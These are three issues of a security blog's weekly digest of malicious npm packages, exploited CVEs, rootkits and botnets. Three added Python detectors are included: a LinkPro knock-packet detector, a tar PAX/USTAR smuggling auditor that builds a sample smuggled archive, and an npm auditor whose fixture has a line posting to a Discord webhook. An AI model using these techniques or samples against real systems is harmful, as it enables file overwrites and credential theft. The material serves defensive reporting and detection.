
Human Factor Blog

how human behavior affects security

Programmer’s Digest #157

10/23/2025-10/29/2025 10 npm Packages Caught Stealing Developer Credentials, Active Exploits Hit Dassault and XWiki, Magento Input Validation Vulnerability Exploited In Wild And More.

1. 10 npm Packages Caught Stealing Developer Credentials on Windows, macOS, and Linux

Cybersecurity researchers uncovered 10 typosquatted npm packages (uploaded July 4, 2025, ~9,900 total downloads) that install a multi-stage information stealer for Windows, Linux and macOS. The packages impersonate popular libraries (TypeScript, discord.js, ethers.js, nodemon, react-router-dom, zustand) and trigger a malicious postinstall hook that runs install.js, opens a new terminal window, and launches an obfuscated app.js. The payload shows a fake CAPTCHA and believable install output while fingerprinting victims by IP and fetching a 24 MB PyInstaller stealer from 195.133.79[.]43. app.js uses four layers of obfuscation (XOR, URL-encoding, hex/octal tricks) to resist analysis. The stealer extracts credentials, tokens, cookies, SSH keys and system keyring secrets (email, cloud sync, VPN, password managers), compresses them, and exfiltrates the archive — giving attackers direct access to corporate email, file storage, internal networks and production systems.

2. Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack

Threat actors are actively exploiting severe flaws in Dassault Systèmes DELMIA Apriso and XWiki, according to CISA and VulnCheck alerts. The affected issues include CVE-2025-6204 (code injection, CVSS 8.0) and CVE-2025-6205 (missing authorization, CVSS 9.1) in DELMIA Apriso releases 2020–2025, both patched in August, and CVE-2025-24893 (eval injection, CVSS 9.8) in XWiki. CISA recently added these flaws to its Known Exploited Vulnerabilities catalog, following earlier exploitation of CVE-2025-5086 in the same product. VulnCheck observed in-the-wild attacks leveraging the XWiki flaw to deploy a cryptocurrency miner via a two-stage chain: the first stage drops a downloader (“x640”) from 193.32.208[.]24, and the second fetches payloads (“x521,” “x522”) that install and run the miner while terminating rivals. The activity, traced to a Vietnam-based IP (123.25.249[.]88), highlights ongoing exploitation. CISA urges immediate patching, with federal agencies required to remediate DELMIA Apriso flaws by November 18, 2025.

3. Windows Server Emergency Patches Fix WSUS Bug With PoC Exploit

Microsoft has issued out-of-band (OOB) security updates to fix CVE-2025-59287, a critical remote code execution flaw in Windows Server Update Services (WSUS). The vulnerability, now with public proof-of-concept exploit code, affects only Windows servers with the WSUS Server Role enabled. It allows remote, unauthenticated attackers to execute code with SYSTEM privileges via crafted events that trigger unsafe object deserialization, making it potentially wormable between WSUS servers. Microsoft urges admins to install the patches immediately for all supported Windows Server versions (2012–2025). Servers without the WSUS role are not affected, but enabling WSUS without patching exposes systems to attack. As a temporary workaround, admins can disable the WSUS role or block inbound traffic on ports 8530 and 8531, though this stops Windows endpoints from receiving updates. The cumulative OOB patch replaces prior updates, and Microsoft recommends rebooting servers after installation.

4. CISA Flags Critical Lanscope Bug

CISA has warned of a critical vulnerability (CVE-2025-61932, CVSS 9.3) in Motex Lanscope Endpoint Manager, urging all federal agencies to patch or mitigate affected systems by November 12, 2025. The flaw, confirmed by Motex through Japan’s JVN portal, allows remote code execution via specially crafted packets due to improper verification of communication sources. Exploitation could enable attackers to steal data, deploy ransomware, or compromise entire networks. The issue affects on-premises versions of Lanscope’s Client and Detection Agent. Motex has released fixes in versions 9.3.2.7–9.4.7.3; systems running 9.4.7.1 or earlier remain vulnerable. CISA advises organizations to upgrade immediately, restrict network access, enable zero-trust controls, and continuously monitor for anomalies. Because Lanscope manages privileged enterprise endpoints, unpatched systems present significant risk, underscoring the need for timely updates, strong access control, and layered cyber defenses.

5. Magento Input Validation Vulnerability Exploited In Wild To Hijack Session And Execute Malicious Codes

A critical flaw in Magento (Adobe Commerce), dubbed SessionReaper and tracked as CVE-2025-54236, allows attackers to hijack user sessions and execute remote code. First disclosed on September 9, 2025, the vulnerability gained urgency after Sansec released a proof-of-concept exploit on October 22, sparking mass exploitation attempts. Over 250 Magento stores were reportedly compromised as attackers targeted unpatched systems ahead of the holiday season. The flaw, rated CVSS 9.8, stems from improper input validation in Magento’s authentication process, enabling attackers to impersonate users, access admin panels, or upload malicious code to steal data and install backdoors. Akamai detected more than 300 probes within 48 hours of the exploit’s release, blocking attacks via its security engine. Experts warn that while web application firewalls help, the only reliable defense is applying Adobe’s latest patches immediately to prevent large-scale e-commerce breaches.


Programmer’s Digest #156

10/15/2025-10/22/2025 Self-Spreading ‘GlassWorm’, CISA Flags Critical Lanscope Bug, LinkPro Rootkit Attacking GNU/Linux Systems And More.

1. Self-Spreading ‘GlassWorm’ Infects VS Code Extensions in Widespread Supply Chain Attack

Cybersecurity researchers uncovered GlassWorm, a self-propagating worm hidden in VS Code extensions on the Open VSX Registry and the Microsoft Marketplace that targets developers. The campaign — the second major DevOps supply-chain worm since Shai-Hulud in mid-September 2025 — uses the Solana blockchain for resilient command-and-control with Google Calendar as a fallback, and hides malicious code using invisible Unicode variation selectors. GlassWorm steals npm, Open VSX, GitHub and Git credentials, drains funds from 49 crypto wallet extensions, deploys SOCKS proxies, installs hidden VNC servers, and weaponizes stolen credentials to compromise more packages. Fourteen extensions (13 on Open VSX, 1 on the Microsoft Marketplace) were infected, totalling about 35,800 downloads, with the first wave on October 17, 2025; how the extensions were hijacked is unknown. The malicious payload retrieves Base64 C2 instructions from Solana memos and Google Calendar events, then drops a JavaScript module (Zombi) that completes the takeover. Because VS Code extensions auto-update, attackers can push changes silently — researchers warn it’s a worm built to spread across the developer ecosystem.

2. CISA Flags Critical Lanscope Bug

CISA has issued an alert for a critical flaw (CVE-2025-61932) in Motex Lanscope Endpoint Manager, urging all federal agencies to patch or mitigate affected systems by November 12, 2025. Motex confirmed reports of malicious packets exploiting the vulnerability through Japan’s JVN portal.

The flaw, rated 9.3 on the CVSS v4 scale, affects on-premises Lanscope Client and Detection Agent components. It stems from improper source verification in communication channels, allowing remote attackers to execute arbitrary code via crafted packets—potentially leading to data theft, ransomware, or full network compromise.

Motex has released patches in versions 9.3.2.7–9.4.7.3; earlier builds remain vulnerable. CISA recommends upgrading immediately, restricting Lanscope network access, enabling continuous monitoring, and enforcing least privilege and MFA. Exploitation risks highlight the need for layered defenses, timely patching, and strong endpoint security to prevent large-scale enterprise compromise.

3. LinkPro Rootkit Attacking GNU/Linux Systems Using eBPF Module to Hide Malicious Activities

LinkPro is a sophisticated eBPF-based rootkit for GNU/Linux discovered during forensics on a compromised AWS environment. The intrusion began via an internet-exposed Jenkins server (CVE-2024-23897) and a malicious Docker image (kvlnt/vv) deployed across EKS clusters, enabling container escape and credential theft. Written in Go, LinkPro runs in two modes: a passive reverse mode that activates after a TCP “magic” packet and an active forward mode for direct C2. Its stealth uses two eBPF modules—Hide (intercepts getdents, sys_bpf, tracepoints and hides files/processes/eBPF programs) and Knock (XDP/TC programs that detect a TCP SYN with window 54321, store source IPs, and rewrite headers to tunnel traffic to port 2233); it falls back to /etc/ld.so.preload if needed. Persistence is achieved by masquerading as system-resolved via a fake systemd unit and planting a timestamped binary. LinkPro provides shell access, file ops, SOCKS5, and multi-protocol tunneling (HTTP/WebSocket/TCP/UDP/DNS) with XOR obfuscation. Monitor unusual systemd units and eBPF activity.
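A small detector for the Knock trigger described above, written for this digest as an added example (not code from the LinkPro analysis): it parses raw IPv4/TCP packets and flags a bare SYN whose window field is 54321. The packets, addresses and ports are constructed here for the demo.

```python
"""Flag the LinkPro 'Knock' trigger described above: a bare TCP SYN whose window field is 54321."""
import struct
from ipaddress import IPv4Address

KNOCK_WINDOW = 54321          # magic value from the digest
SYN, ACK = 0x02, 0x10

def parse_ipv4_tcp(pkt: bytes):
    """Return (src, dst, dport, flags, window) for an IPv4/TCP packet, or None otherwise."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:   # protocol 6 = TCP
        return None
    src, dst = str(IPv4Address(pkt[12:16])), str(IPv4Address(pkt[16:20]))
    _sport, dport, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", pkt[ihl:ihl + 16])
    return src, dst, dport, off_flags & 0x1FF, window

def is_knock(pkt: bytes) -> bool:
    """True for a SYN without ACK carrying the magic window; SYN/ACK replies do not count."""
    parsed = parse_ipv4_tcp(pkt)
    if parsed is None:
        return False
    flags, window = parsed[3], parsed[4]
    return bool(flags & SYN) and not (flags & ACK) and window == KNOCK_WINDOW

def knock_sources(packets) -> list:
    """Distinct sources that knocked; the rootkit records these before tunnelling their traffic."""
    return sorted({parse_ipv4_tcp(p)[0] for p in packets if is_knock(p)})

def build_tcp(src: str, dst: str, dport: int, window: int, flags: int = SYN) -> bytes:
    """Constructed IPv4+TCP packet for the demo (checksums left zero; never transmitted)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIHHHH", 40000, dport, 1, 0, (5 << 12) | flags, window, 0, 0)
    return ip + tcp

# Constructed traffic: one knock, one ordinary SYN, one SYN/ACK that happens to carry the value
SAMPLE = [
    build_tcp("203.0.113.7", "10.0.0.5", 443, KNOCK_WINDOW),
    build_tcp("203.0.113.8", "10.0.0.5", 443, 65535),
    build_tcp("203.0.113.9", "10.0.0.5", 443, KNOCK_WINDOW, flags=SYN | ACK),
]
```

In practice the same check belongs in a Suricata/Zeek rule or an XDP program of your own; the point here is the header fields to key on.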

4. PolarEdge Targets Cisco, ASUS, QNAP, Synology Routers in Expanding Botnet Campaign

Cybersecurity researchers have detailed PolarEdge, a botnet malware first identified by Sekoia in February 2025. It targets routers from vendors such as Cisco and Synology, and its purpose remains unknown. Attackers have exploited a known Cisco flaw (CVE-2023-20118) to install the malware.

PolarEdge is a TLS-based backdoor. Its primary function is to send a host fingerprint to its command-and-control (C2) server and then listen for commands over a built-in TLS server. It supports two modes: a connect-back mode to download files and a debug mode to alter its configuration on-the-fly. However, its default mode is to act as a TLS server, parsing incoming requests with a custom protocol. If a specific “HasCommand” parameter is set, it executes the received command and returns the output.

The malware uses anti-analysis techniques, including process masquerading, and employs a mechanism to automatically relaunch itself if the main process ends. Although it does not ensure persistence across reboots, a child process checks every 30 seconds and restarts the backdoor if needed.

5. TARmageddon Flaw in Async-Tar Rust Library Could Enable Remote Code

Researchers uncovered CVE-2025-62518, a high-severity flaw (CVSS 8.1) in the async-tar Rust library and its forks, including tokio-tar, that can enable remote code execution (RCE) via file overwriting. Dubbed TARmageddon by Edera, the issue affects popular projects like testcontainers and wasmCloud. The bug stems from inconsistent handling of PAX and USTAR headers when parsing TAR files—if a PAX header specifies a valid size but the USTAR header lists zero, the parser misinterprets embedded data as new TAR entries. Attackers can exploit this to smuggle nested archives and overwrite critical files such as configuration or build scripts. Tokio-tar, last updated in July 2023, is considered abandonware; users should migrate to astral-tokio-tar v0.5.6, which fixes the issue. The flaw highlights that even memory-safe languages like Rust remain vulnerable to logic errors that can lead to severe security risks if left unpatched.
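To make the PAX/USTAR ambiguity concrete, here is an added audit example (not code from async-tar, tokio-tar or Edera) that walks a tar stream, reports any entry whose PAX size record disagrees with its USTAR size field, and can optionally mimic a parser that trusts only the USTAR size to show how a body gets re-read as new entries. The archive, file names and contents are constructed inline.

```python
"""Audit a tar stream for PAX/USTAR size disagreement, the ambiguity behind TARmageddon."""
BLOCK = 512

def _octal(field: bytes) -> int:
    return int(field.split(b"\0", 1)[0].strip() or b"0", 8)

def _pad(n: int) -> int:
    return (n + BLOCK - 1) // BLOCK * BLOCK

def _header(name: bytes, size: int, typeflag: bytes) -> bytes:
    # Minimal USTAR header, constructed for this demo (mode/uid/gid/mtime zeroed)
    h = bytearray(BLOCK); h[:len(name)] = name
    h[100:108], h[108:116], h[116:124] = b"0000644\0", b"0000000\0", b"0000000\0"
    h[124:136] = b"%011o\0" % size
    h[136:148], h[148:156], h[156:157] = b"00000000000\0", b"        ", typeflag
    h[257:265] = b"ustar\x0000"
    h[148:156] = b"%06o\0 " % sum(h)  # checksum is computed with the field blanked, per spec
    return bytes(h)

def _entry(name: bytes, body: bytes, typeflag: bytes = b"0", ustar_size=None) -> bytes:
    size = len(body) if ustar_size is None else ustar_size
    return _header(name, size, typeflag) + body + b"\0" * (_pad(len(body)) - len(body))

def _pax_record(key: str, val) -> bytes:
    body = f" {key}={val}\n"  # PAX record: "<total length> key=value\n", length counts itself
    n = next(n for n in range(len(body) + 1, len(body) + 8) if len(str(n)) + len(body) == n)
    return f"{n}{body}".encode()

def list_entries(data: bytes, trust_pax: bool):
    """Return (entry names, findings). trust_pax=False mimics a parser that skips each body by
    the USTAR size alone, so a body the PAX header sized is re-read as fresh entries."""
    names, findings, pax_size, pos = [], [], None, 0
    while pos + BLOCK <= len(data) and data[pos:pos + BLOCK] != b"\0" * BLOCK:
        hdr = data[pos:pos + BLOCK]; pos += BLOCK
        name = hdr[:100].split(b"\0", 1)[0].decode()
        usize, typeflag = _octal(hdr[124:136]), hdr[156:157]
        if typeflag == b"x":  # PAX extended header that applies to the next entry
            for rec in data[pos:pos + usize].decode().split("\n"):
                if "=" in rec:
                    key, val = rec.split(" ", 1)[1].split("=", 1)
                    if key == "size": pax_size = int(val)
            pos += _pad(usize); continue
        if pax_size is not None and pax_size != usize:  # the TARmageddon condition
            findings.append((name, usize, pax_size))
        body_len = pax_size if (trust_pax and pax_size is not None) else usize
        pos += _pad(body_len); names.append(name); pax_size = None
    return names, findings

# Constructed sample: a nested archive hidden in the body of "notes.txt", whose USTAR size is 0
SMUGGLED = _entry(b"build.sh", b"#!/bin/sh\necho smuggled\n")
ARCHIVE = (_entry(b"PaxHeader/notes.txt", _pax_record("size", len(SMUGGLED)), typeflag=b"x")
           + _entry(b"notes.txt", SMUGGLED, ustar_size=0)
           + _entry(b"README", b"hello\n") + b"\0" * (2 * BLOCK))
```

Run against `ARCHIVE`, the USTAR-only walk lists a phantom `build.sh` entry while the PAX-aware walk does not; either way the findings list names the entry whose two sizes disagree, which is the condition to reject before any file is written.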

6. Five New Exploited Bugs Land in CISA’s Catalog — Oracle and Microsoft Among Targets

CISA added five flaws to its Known Exploited Vulnerabilities catalog, confirming that CVE-2025-61884—an SSRF in Oracle Configurator’s Runtime component—has been weaponized. Rated 7.5, the bug is remotely exploitable without authentication and could expose critical data. It’s the second actively exploited Oracle E-Business Suite defect alongside CVE-2025-61882 (9.8), which enables unauthenticated RCE; Google GTI and Mandiant reported dozens of affected organizations, and some activity may tie to Cl0p extortion operations.

CISA also listed four other issues: CVE-2025-33073 (Windows SMB Client privilege escalation, CVSS 8.8 — fixed June 2025), CVE-2025-2746 and CVE-2025-2747 (Kentico Xperience authentication bypasses, both 9.8 — fixed March 2025), and CVE-2022-48503 (Apple JavaScriptCore array-index validation, 8.8 — fixed July 2022). Exploitation details for those four remain sparse.

Federal Civilian Executive Branch agencies must remediate these KEV entries by November 10, 2025 to mitigate active threats.


Programmer’s Digest #155

10/08/2025-10/15/2025 npm, PyPI, and RubyGems Packages, Critical Vulnerabilities in NetWeaver, Hackers Exploit Auth Bypass in Service Finder WordPress Theme And More.

1. npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels

Researchers found malicious packages on npm, PyPI and RubyGems that use Discord webhooks as a command-and-control channel to exfiltrate stolen data. Discord webhooks post to channels without authentication and are effectively write-only, so defenders can’t read previous posts from the URL. Examples include npm’s mysql-dumpdiscord (steals config/.env files), nodejs.discord (logs via webhook), PyPI packages malinssx/malicus/maliinn (trigger HTTP calls on pip install), and RubyGems’ sqlcommenter_rails (collects host files like /etc/passwd and sends them to a hard-coded webhook). By abusing free, fast webhooks and hiding in install-time hooks or build scripts, attackers can siphon .env files, API keys, credentials, and host details from developer machines and CI runners before runtime detection. The company also flagged 338 malicious npm packages tied to a North Korean “Contagious Interview” campaign that lures developers with fake job offers and booby-trapped repos, using typosquats to deliver stealers and backdoors like BeaverTail and InvisibleFerret.
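The two npm items in this and the later digest (typosquats with a malicious postinstall hook, and packages that exfiltrate through Discord webhooks) share the same defensive checks, so here is one added audit example covering both; it is not code from any of the cited researchers. It flags package names within two edits of the libraries the stealer campaign impersonated, install-time lifecycle scripts, and hard-coded Discord webhook URLs in package sources; the manifest and file contents are constructed for the demo.

```python
"""Flag the install-time abuse patterns from the two npm items: typosquatted names, lifecycle
install hooks, and hard-coded Discord webhook URLs used as a write-only exfiltration channel."""
import re

# Names the stealer campaign impersonated, per the digest (TypeScript, discord.js, ethers.js, ...)
POPULAR = {"typescript", "discord.js", "ethers", "nodemon", "react-router-dom", "zustand"}
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
WEBHOOK_RE = re.compile(r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)")

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; typosquats sit one or two keystrokes from the name they mimic."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def typosquat_of(name: str, max_dist: int = 2):
    """Popular package this name imitates, or None if the name is exact or unrelated."""
    if name in POPULAR:
        return None
    dist, target = min((edit_distance(name, p), p) for p in POPULAR)
    return target if dist <= max_dist else None

def webhook_urls(text: str) -> list:
    """Discord webhook URLs found in text, with the secret token masked for safe reporting."""
    return sorted({text[m.start(): m.start(2)] + "***" for m in WEBHOOK_RE.finditer(text)})

def audit_package(manifest: dict, files: dict) -> list:
    """manifest: parsed package.json; files: {path: source text}. Returns human-readable findings."""
    findings = []
    target = typosquat_of(manifest.get("name", ""))
    if target:
        findings.append(f"name '{manifest['name']}' is within 2 edits of popular '{target}'")
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append(f"install-time hook '{hook}' runs: {cmd}")
    for path, text in files.items():
        for url in webhook_urls(text):
            findings.append(f"{path}: hard-coded Discord webhook {url}")
    return findings

# Constructed sample modelled on the digest items; not the contents of any real package
SAMPLE_MANIFEST = {"name": "typescrpt", "version": "1.0.0",
                   "scripts": {"postinstall": "node install.js", "test": "jest"}}
SAMPLE_FILES = {
    "install.js": "require('child_process').exec('node app.js');",
    "app.js": "fetch('https://discord.com/api/webhooks/123456789012345678/AbCdEf-GhIjK', {method: 'POST'});",
}
```

Running `npm install --ignore-scripts` in CI and reviewing `audit_package` output for each new dependency catches all three patterns before any hook executes.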

2. SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM

SAP released 16 new and updated security notes in its October 2025 Patch Day, including three addressing critical vulnerabilities. The most severe, CVE-2025-42944 (CVSS 10.0), is an insecure deserialization flaw in NetWeaver AS Java. Originally patched in September, the new update adds JVM-wide filters (jdk.serialFilter) to block unsafe class deserialization. Another critical bug, CVE-2025-42937 (CVSS 9.8), is a directory traversal flaw in Print Service that could let unauthenticated attackers overwrite system files. SAP also fixed CVE-2025-42910 (CVSS 9.0), an unrestricted file upload vulnerability in Supplier Relationship Management (SRM) that may allow malware uploads. Two high-severity flaws were addressed in Commerce Cloud (DoS bug, CVE-2025-5115) and Data Hub Integration Suite (misconfiguration flaw, CVE-2025-48913). Ten additional notes fix medium- and low-severity issues across NetWeaver, S/4HANA, and other platforms. No active exploitation has been reported, but SAP urges prompt patching due to known targeting of its software.

3. Hackers Exploit Auth Bypass in Service Finder WordPress Theme

Hackers are actively exploiting a critical flaw (CVE-2025-5947, CVSS 9.8) in the Service Finder WordPress theme that lets them bypass authentication and log in as administrators. The bug, caused by improper validation of the original_user_id cookie in the service_finder_switch_back() function, affects versions 6.0 and earlier. With admin access, attackers can fully control a WordPress site, create accounts, upload PHP files, and export databases. Security firm Wordfence has recorded over 13,800 exploit attempts since August 1, with attack spikes exceeding 1,500 daily in late September. The flaw was discovered by researcher “Foxyyy” and patched by developer Aonetheme in version 6.1, released July 17. Most attacks come from five IPs, though new ones may appear. Administrators should review logs for suspicious activity or new accounts, block the listed IPs, and update immediately, as attackers can erase traces of compromise once they gain admin access.

4. 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign

Researchers flagged 175 malicious npm packages (26,000 downloads) used in a phishing campaign dubbed Beamglea, targeting 135+ industrial, tech, and energy firms. The packages act as hosting for redirect scripts served via npm’s registry and unpkg.com CDN rather than executing malware on install. A script named redirect_generator.py programmatically publishes packages like redirect-xxxxxx, injecting victim emails and phishing URLs. Each package provides an HTML file that loads beamglea.js from UNPKG; that JavaScript redirects victims to credential-harvesting pages while pre-filling the email field, boosting success rates. Socket found over 630 such HTML files masquerading as purchase orders, specs, or project docs. Distribution likely relies on phishing emails that prompt recipients to open the crafted HTML. Attackers leverage free, trusted infrastructure (npm + UNPKG) to build resilient, low-cost phishing infrastructure, avoiding detection by not performing malicious actions during package install. The campaign underscores how legitimate platforms can be abused as hosting for targeted credential theft.

5. RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing

Chipmaker AMD has released fixes for a security flaw named “RMPocalypse,” which undermines the confidentiality guarantees of its Secure Encrypted Virtualization (SEV-SNP) technology. According to ETH Zürich researchers, the attack exploits incomplete protections, allowing a single malicious write to the Reverse Map Paging (RMP) table—a critical structure storing security metadata for all DRAM pages. The vulnerability (CVE-2025-0033, CVSS score 5.9) is a race condition occurring during the initialization of the RMP by the AMD Secure Processor (ASP/PSP). This permits a malicious hypervisor to manipulate the RMP’s initial content, compromising the memory integrity of SEV-SNP protected virtual machines. A compromised RMP voids all SEV-SNP integrity and confidentiality guarantees, enabling attackers to bypass isolation, forge attestations, and exfiltrate all secrets with a 100% success rate.

Impacted products include multiple AMD EPYC™ 7003, 8004, 9004, and 9005 series processors. While fixes are available for many, some embedded series updates are planned for November 2025. Microsoft and Supermicro are also addressing the flaw in their respective platforms. This incident highlights a critical catch-22 where the security mechanism itself was not fully protected during VM startup.
